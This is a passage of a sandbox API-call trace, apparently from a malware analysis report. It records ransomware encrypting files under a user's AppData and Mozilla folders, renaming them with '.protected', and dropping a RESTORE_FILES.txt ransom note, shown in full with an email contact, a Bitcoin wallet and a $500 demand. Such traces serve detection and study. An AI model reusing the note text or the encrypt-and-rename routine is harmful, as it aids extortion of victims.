\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.421] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0090.422] lstrlenA (lpString="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") returned 684 [0090.422] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0090.422] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.422] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.422] CloseHandle (hObject=0xd4) returned 1 [0090.422] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0090.422] lstrcmpiW (lpString1="moMg3J.bmp", lpString2="Windows") returned -1 [0090.422] lstrcmpiW (lpString1="moMg3J.bmp", lpString2="Program Files") returned -1 [0090.422] lstrcmpiW (lpString1="moMg3J.bmp", lpString2="Program Files (x86)") returned -1 [0090.422] lstrcmpiW (lpString1="moMg3J.bmp", lpString2="$Recycle.bin") returned 1 [0090.422] lstrcmpiW (lpString1="moMg3J.bmp", lpString2="System Volume Information") returned -1 [0090.422] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp") returned 60 [0090.422] StrStrIW (lpFirst="moMg3J.bmp", lpSrch=".protected") returned 0x0 [0090.422] lstrcmpW (lpString1="moMg3J.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0090.422] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0090.422] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0090.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\momg3j.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0090.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp") returned 60 [0090.423] StrStrW (lpFirst="moMg3J.bmp", lpSrch=".txt") returned 0x0 [0090.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp") returned 60 [0090.423] StrStrW (lpFirst="moMg3J.bmp", lpSrch=".rar") returned 0x0 
[0090.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp") returned 60 [0090.423] StrStrW (lpFirst="moMg3J.bmp", lpSrch=".zip") returned 0x0 [0090.423] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0090.423] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.423] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0090.424] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.424] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0090.424] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0090.424] CloseHandle (hObject=0xd4) returned 1 [0090.425] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp.protected") returned 70 [0090.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\momg3j.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\moMg3J.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\momg3j.bmp.protected")) returned 1 [0090.426] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0090.426] lstrcmpiW (lpString1="Mozilla", lpString2="Windows") returned -1 [0090.426] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files") returned -1 [0090.426] lstrcmpiW (lpString1="Mozilla", lpString2="Program Files (x86)") returned -1 [0090.426] lstrcmpiW (lpString1="Mozilla", lpString2="$Recycle.bin") returned 1 [0090.426] lstrcmpiW (lpString1="Mozilla", lpString2="System Volume Information") returned -1 [0090.426] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla") returned 57 [0090.426] lstrcmpW (lpString1="Mozilla", lpString2=".") returned 1 [0090.426] lstrcmpW (lpString1="Mozilla", lpString2="..") returned 1 [0090.426] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\*") returned 59 [0090.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0090.426] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.426] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.426] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.426] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.426] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.426] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\.") returned 59 [0090.426] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.426] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: 
lpFindFileData=0x295ecb0) returned 1 [0090.426] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.426] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.426] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.426] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.426] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.426] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\..") returned 60 [0090.426] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.426] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.427] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.427] lstrcmpiW (lpString1="Extensions", lpString2="Windows") returned -1 [0090.427] lstrcmpiW (lpString1="Extensions", lpString2="Program Files") returned -1 [0090.427] lstrcmpiW (lpString1="Extensions", lpString2="Program Files (x86)") returned -1 [0090.427] lstrcmpiW (lpString1="Extensions", lpString2="$Recycle.bin") returned 1 [0090.427] lstrcmpiW (lpString1="Extensions", lpString2="System Volume Information") returned -1 [0090.427] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions") returned 68 [0090.427] lstrcmpW (lpString1="Extensions", lpString2=".") returned 1 [0090.427] lstrcmpW (lpString1="Extensions", lpString2="..") returned 1 [0090.427] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\*") returned 70 [0090.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 
0x47ba50 [0090.427] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.428] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.428] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.428] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.428] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.428] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\.") returned 70 [0090.428] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.428] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.428] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.428] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.428] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.428] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.428] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.428] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\..") returned 71 [0090.428] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.428] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.428] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.428] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.428] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\RESTORE_FILES.txt") returned 86 [0090.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\extensions\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.428] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.429] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, 
lpOverlapped=0x0) returned 1 [0090.429] lstrlenA (lpString="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") returned 684 [0090.429] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.429] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.429] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.429] CloseHandle (hObject=0xd8) returned 1 [0090.430] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.430] lstrcmpiW (lpString1="Firefox", lpString2="Windows") returned -1 [0090.430] lstrcmpiW (lpString1="Firefox", lpString2="Program Files") returned -1 [0090.430] lstrcmpiW (lpString1="Firefox", lpString2="Program Files (x86)") returned -1 [0090.430] lstrcmpiW (lpString1="Firefox", lpString2="$Recycle.bin") returned 1 [0090.430] lstrcmpiW (lpString1="Firefox", lpString2="System Volume Information") returned -1 [0090.430] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox") returned 65 [0090.430] lstrcmpW (lpString1="Firefox", lpString2=".") returned 1 [0090.430] lstrcmpW (lpString1="Firefox", lpString2="..") returned 1 [0090.430] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*") returned 67 [0090.430] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.430] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.430] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.430] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.430] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.430] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.430] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\.") returned 67 [0090.431] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.431] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.431] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.431] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.431] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.431] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.431] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.431] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\..") returned 68 [0090.431] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.431] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.431] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.431] lstrcmpiW (lpString1="Crash Reports", lpString2="Windows") returned -1 [0090.431] lstrcmpiW (lpString1="Crash Reports", lpString2="Program Files") returned -1 [0090.431] lstrcmpiW (lpString1="Crash Reports", lpString2="Program Files (x86)") returned -1 [0090.431] lstrcmpiW 
(lpString1="Crash Reports", lpString2="$Recycle.bin") returned 1 [0090.431] lstrcmpiW (lpString1="Crash Reports", lpString2="System Volume Information") returned -1 [0090.431] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 79 [0090.431] lstrcmpW (lpString1="Crash Reports", lpString2=".") returned 1 [0090.431] lstrcmpW (lpString1="Crash Reports", lpString2="..") returned 1 [0090.431] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*") returned 81 [0090.431] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.432] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.432] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.432] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.432] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.432] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.432] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\.") returned 81 [0090.432] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.432] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.432] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.432] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.432] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.432] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 
[0090.432] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.432] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\..") returned 82 [0090.432] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.432] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.432] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.432] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="Windows") returned -1 [0090.432] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="Program Files") returned -1 [0090.432] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="Program Files (x86)") returned -1 [0090.432] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="$Recycle.bin") returned 1 [0090.432] lstrcmpiW (lpString1="InstallTime20131025151332", lpString2="System Volume Information") returned -1 [0090.432] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned 105 [0090.432] StrStrIW (lpFirst="InstallTime20131025151332", lpSrch=".protected") returned 0x0 [0090.432] lstrcmpW (lpString1="InstallTime20131025151332", lpString2="RESTORE_FILES.txt") returned -1 [0090.432] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.432] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned 105 [0090.433] StrStrW (lpFirst="InstallTime20131025151332", lpSrch=".txt") returned 0x0 [0090.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned 105 [0090.433] StrStrW (lpFirst="InstallTime20131025151332", lpSrch=".rar") returned 0x0 [0090.433] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332") returned 105 [0090.433] StrStrW (lpFirst="InstallTime20131025151332", lpSrch=".zip") returned 0x0 [0090.433] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xa, lpOverlapped=0x0) returned 1 [0090.434] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffff6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.434] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xa, lpOverlapped=0x0) returned 1 [0090.434] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.434] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 
[0090.434] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.434] CloseHandle (hObject=0x150) returned 1 [0090.435] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.protected") returned 115 [0090.435] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332.protected")) returned 1 [0090.443] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.443] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.443] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\RESTORE_FILES.txt") returned 97 [0090.443] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.444] lstrlenA (lpString="! 
